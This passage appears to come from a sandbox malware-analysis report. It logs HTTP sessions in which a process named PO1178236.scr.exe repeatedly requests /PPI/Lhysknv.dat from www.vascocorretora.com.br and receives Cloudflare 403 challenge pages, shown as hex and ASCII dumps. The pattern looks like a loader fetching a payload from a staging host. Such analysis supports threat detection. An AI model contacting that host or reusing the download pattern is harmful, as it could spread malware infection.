        2025-01-09 07:37:05 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:37:05 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 39 33 33 66 39 32 34 33 64 39 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c2933f9243d9</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:37:05 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 39 33 33 66 39 32 34 33 64 39 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c2933f9243d9',t:'MTczNjQwODIyNS4wMDAwMDA='};var
        2025-01-09 07:37:05 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        113192.168.2.949822188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:06 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:06 UTC1003INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:06 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:21 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AQV2Uehil6L7VGgE7HK2QOgv2xORNf6Yr8iva4ZC6MRa3V907jfbCB4BzYtU3vXjVI3gnukg8XNuiBY1GlYdwrLwO7aERCKUTf2l46Hx39tVTz%2BImclv6UjQ4UBXtFhQlJ6Vg%2BcbNgGwqXwh"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c296e8d517e9-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1641&rtt_var=630&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1716637&cwnd=232&unsent_bytes=0&cid=227cd384b546d3ab&ts=132&x=0"
        2025-01-09 07:37:06 UTC366INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:06 UTC1369INData Raw: 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65
        Data Ascii: e</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device
        2025-01-09 07:37:06 UTC1369INData Raw: 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63 68 61
        Data Ascii: highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captcha
        2025-01-09 07:37:06 UTC1369INData Raw: 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 39 36 65 38 64 35 31 37 65 39 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62
        Data Ascii: t border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c296e8d517e9</strong></span> <span class="cf-footer-separator sm:hidden">&b
        2025-01-09 07:37:06 UTC996INData Raw: 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 39 36 65 38 64 35 31 37 65 39 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4e 69 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64
        Data Ascii: ._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c296e8d517e9',t:'MTczNjQwODIyNi4wMDAwMDA='};var a=d
        2025-01-09 07:37:06 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        114192.168.2.949823188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:06 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:07 UTC1007INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:07 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:22 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OB3uuyalJRil%2BpIsNboXH87Yq%2Bi7VMEg1rPr9040exzP7gzdaKG%2FfZcJpw28DV3NNrzueuhWVgrL7YeztC3O4NMSjt5vb4Iear%2FAMiKaAo1WLmK3bo8sekeLEoYLVGSwoWvBgcHkm9D9rYw5"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c29ac9e14238-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1755&min_rtt=1754&rtt_var=661&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1652518&cwnd=244&unsent_bytes=0&cid=fd7e7b65f42210e4&ts=164&x=0"
        2025-01-09 07:37:07 UTC362INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:07 UTC1369INData Raw: 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65
        Data Ascii: flare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=de
        2025-01-09 07:37:07 UTC1369INData Raw: 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70
        Data Ascii: cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.cap
        2025-01-09 07:37:07 UTC1369INData Raw: 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 39 61 63 39 65 31 34 32 33 38 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e
        Data Ascii: -left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c29ac9e14238</strong></span> <span class="cf-footer-separator sm:hidden
        2025-01-09 07:37:07 UTC1000INData Raw: 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 32 39 61 63 39 65 31 34 32 33 38 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 49 79 4e 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72
        Data Ascii: ndow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c29ac9e14238',t:'MTczNjQwODIyNy4wMDAwMDA='};var
        2025-01-09 07:37:07 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        115192.168.2.949824188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:37:07 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:37:07 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:37:07 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:37:22 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sJoqX0YPnyQ1RcfwXmWpbAA63nQq5pMA9rbn4UDYGEc48wSroN6Zz7xRp2FTcbhB7Rgxcle2gCZ%2Fq76k9rUilx3tT%2Fn5e0bJHnUry4eujY3WLqJ8M79ezfY6Log5L%2BlX7E8LQjqhVkGE8ykn"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c29ed9d27286-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=2044&min_rtt=2041&rtt_var=768&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1430671&cwnd=241&unsent_bytes=0&cid=68bf97fe60a99528&ts=154&x=0"
        2025-01-09 07:37:07 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:37:07 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:37:07 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:37:07 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 32 39 65 64 39 64 32 37 32 38 36 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 